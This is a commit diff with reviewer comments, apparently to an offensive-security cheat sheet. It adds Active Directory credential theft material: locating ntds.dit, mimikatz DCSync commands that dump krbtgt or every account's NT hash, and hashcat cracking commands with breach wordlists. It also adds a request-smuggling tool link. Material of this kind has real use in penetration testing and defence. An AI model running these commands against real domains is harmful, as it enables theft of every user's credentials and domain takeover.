NTLM Hashcat
parent 6a82f47f32, commit bd184487e5
@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen
### Dumping AD Domain Credentials
### Dumping AD Domain Credentials
You will need the following files to extract the ntds :
You will need the following files to extract the ntds :
- ntds file (C:\Windows\NTDS\ntds.dit)
- NTDS.dit file
- SYSTEM hive (C:\Windows\System32\SYSTEM)
- SYSTEM hive (C:\Windows\System32\SYSTEM)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
However you can change the location to a custom one, you will need to query the registry to get the current location.
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
```
#### Using ndtsutil
#### Using ndtsutil
```powershell
```powershell
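Review bot: the new paragraph says the ntds "can be found in two locations", but the second one it then describes, `systemroot\System32\ntds.dit`, is the pristine distribution copy used during promotion and contains no domain accounts, so it is useless for credential extraction; say plainly that the live database (`%SystemRoot%\NTDS\ntds.dit` by default, or whatever the `DSA Database file` value returns) is the only copy worth grabbing. Write `systemroot` as `%SystemRoot%`, since it is an environment variable, not a literal directory name. Two errors in the unchanged lines of this hunk should be fixed while here: `- SYSTEM hive (C:\Windows\System32\SYSTEM)` gives the wrong path, the hive lives at `C:\Windows\System32\config\SYSTEM`, and the heading `#### Using ndtsutil` should read `ntdsutil`.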
@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
```powershell
```powershell
# DCSync only one user
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
# DCSync all users of the domain
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
```
```
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
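Review bot: the unchanged sentence above the block ties DCSync to group membership, but what `lsadump::dcsync` actually requires are the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` extended rights on the domain object; the listed groups hold them by default, and any other principal granted them (for example by an attacker with WriteDACL on the domain) can replicate just the same. Worth stating now that the hunk adds `lsadump::dcsync /domain:htb.local /all /csv`, the first example here that replicates every account rather than one: add a sentence that `/all` pulls every principal in the domain, which is far noisier than the `/user:krbtgt` form, and that `/csv` emits one line per account (RID, account name, NT hash) rather than the verbose per-user dump, which is what you want when the output is going straight to a cracker.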
@ -668,6 +682,30 @@ sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt
lsadump::lsa /inject /name:krbtgt
```
```
#### Crack NTLM hashes with hashcat
Useful when you want to have the clear text password or when you need to make stats about weak passwords.
Recommended wordlists:
- rockyou (available in Kali Linux)
- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound)
- Collection #1 (passwords from Data Breaches, might be illegal to possess)
```powershell
# Basic wordlist
# (-O) will Optimize for 32 characters or less passwords
# (-w 4) will set the workload to "Insane"
$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
# Generate a custom mask based on a wordlist
$ git clone https://github.com/iphelix/pack/blob/master/README
$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashes.org](https://hashes.org/check.php)
- [hashes.com](https://hashes.com/en/decrypt/hash)
### Password spraying
### Password spraying
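Review bot: `$ git clone https://github.com/iphelix/pack/blob/master/README` cannot work, that is the URL of one file in the web UI, not a repository; it should be `git clone https://github.com/iphelix/pack`, after which `statsgen.py` and `maskgen.py` are run from the cloned directory. Three more fixes in the same block: the placeholder `-o pathtopotfile` is mislabelled, `-o` is hashcat's outfile for cracked `hash:plain` pairs while the potfile is set with `--potfile-path`, so call it `pathtooutfile`; `statsgen.py` expects one plaintext per line, so pass it the plaintext column (`cut -d: -f2- hashcat.potfile`) rather than the raw potfile whose lines are `hash:plain`; and the `-O` comment overstates the limit, optimized kernels cap candidate length per hash mode (27 for `-m 1000`, hashcat prints the supported maximum at startup) and silently skip anything longer, which skews the weak-password statistics the section says it is for. Smaller points: "Have I Been Powned" should be "Have I Been Pwned", and the block is fenced as `powershell` while the commands carry a `$` prompt and call `python2`; drop the prompts or fence it as `bash`.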
@ -2,11 +2,15 @@
## Summary
## Summary
* [Tools](#tools)
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
* [References](#references)
* [References](#references)
## Tools
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
## CL.TE vulnerabilities
## CL.TE vulnerabilities
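Review bot: the summary links this hunk leaves in place are broken on GitHub, whose anchor generator drops punctuation before hyphenating, so `## CL.TE vulnerabilities` resolves to `#clte-vulnerabilities`, not `#cl.te-vulnerabilities`; the same applies to `#te.cl-vulnerabilities` and `#te.te-behavior-obfuscating-the-te-header`. Since the change is already editing the summary list to add `* [Tools](#tools)` (which is correct as written), fix those three anchors in the same commit rather than shipping a table of contents with three dead links and one working one.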
@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating
## References
## References
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
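Review bot: the context shown in this hunk's header, `Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating`, carries `ofuscating` where the lab slug would read `obfuscating`; that looks like a typo that leaves the challenge link dead, so verify the URL and correct it while the end of this file is being edited. The new reference entry itself follows the list's existing `Title - Author - Date` convention and needs no change.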